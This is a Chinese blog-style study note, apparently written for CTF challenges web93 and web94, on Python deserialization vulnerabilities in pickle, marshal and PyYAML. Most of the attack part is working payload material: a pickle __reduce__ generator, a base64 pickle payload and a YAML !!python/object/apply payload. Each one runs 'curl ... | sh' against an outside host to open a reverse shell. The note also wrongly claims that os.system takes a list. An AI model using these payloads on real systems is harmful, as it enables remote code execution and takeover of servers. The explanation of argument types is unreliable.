【心得】Python的反序列化漏洞个人笔记

目录

python反序列化

①web93

②web94


python反序列化

序列化:

类对象->字节流

反序列化:

字节流->对象

python序列化常用的模板

1 pickle

2 json

特征:

竟然不需要 恶意类

反序列化字符串里面包含类的所有定义,包括类的方法

php反序列化时,只能控制类的属性,利用现有的魔术方法做跳板

python反序列化时,直接可以不需要恶意类,也不需要现有的魔术方法,直接产生类的定义并执行__reduce__方法

Marshal 反序列化

pickle 类无法序列化 code类,为了弥补这个问题,2.6以后增加了marshal模块来处理

PyYAML 反序列化

!!python/object 标签

!!python/object/new 标签

!!python/object/apply 标签

①web93

payload生成脚本

复制代码
import pickle
import os
import base64

class test():
    def __init__(self):
        self.username=0
        self.password=0
    def login(self,username,password):
        return username=='admin' and password=='123456'
    #类似php里的__wakeup__魔术方法
    #返回一个元组,第一个成员是回调函数,第二个成员是回调函数的参数
    def __reduce__(self):
        print('reduce')
        return os.system,('curl https://your-shell.com/124.222.136.33:1337 |sh',)

a=test()
#生成字节流
serialize=pickle.dumps(a)
payload=base64.b64encode(serialize)
print(payload)

注意服务器是linux进行反序列化操作,我们也要在linux上进行序列化操作,否则会报错

payload:

复制代码
.../unserialize

data=gASVTgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDNjdXJsIGh0dHBzOi8veW91ci1zaGVsbC5jb20vMTI0LjIyMi4xMzYuMzM6MTMzNyB8c2iUhZRSlC4=

监听成功反弹shell

②web94

!!python/object/apply 的标签可以让 YAML 解析器执行 Python 代码

方括号被用于将命令字符串作为列表的单个元素,并将整个列表作为参数传递给 os.system 函数。使用方括号是因为 os.system 函数接受的参数类型是一个列表,而不是元组。通过将命令字符串放入列表中,可以确保 os.system 函数正确地接收到命令作为参数。

payload:

复制代码
.../unserialize
data=!!python/object/apply:os.system ["curl https://your-shell.com/124.222.136.33:1337 |sh"]

监听成功反弹shell

相关推荐
勇往直前plus22 分钟前
python格式化字符串
开发语言·前端·python
咋吃都不胖lyh42 分钟前
导出可复用的包版本信息(核心命令)
python
qianshanxue1144 分钟前
计算机操作的一些笔记标题
笔记
土拨鼠烧电路1 小时前
笔记11:数据中台:不是数据仓库,是业务能力复用的引擎
数据仓库·笔记
jiang_changsheng1 小时前
ms-swift 训练、微调、推理、评估、量化与部署的统一框架。配合comfyui使用
人工智能·python
撩妹小狗1 小时前
科赫雪花--Python--数学原理--turtle绘图
python·线性代数·几何学
土拨鼠烧电路1 小时前
笔记14:集成与架构:连接孤岛,构建敏捷响应能力
笔记·架构
宝贝儿好2 小时前
【强化学习】第十章:连续动作空间强化学习:随机高斯策略、DPG算法
人工智能·python·深度学习·算法·机器人
烟花落o2 小时前
栈和队列的知识点及代码
开发语言·数据结构·笔记·栈和队列·编程学习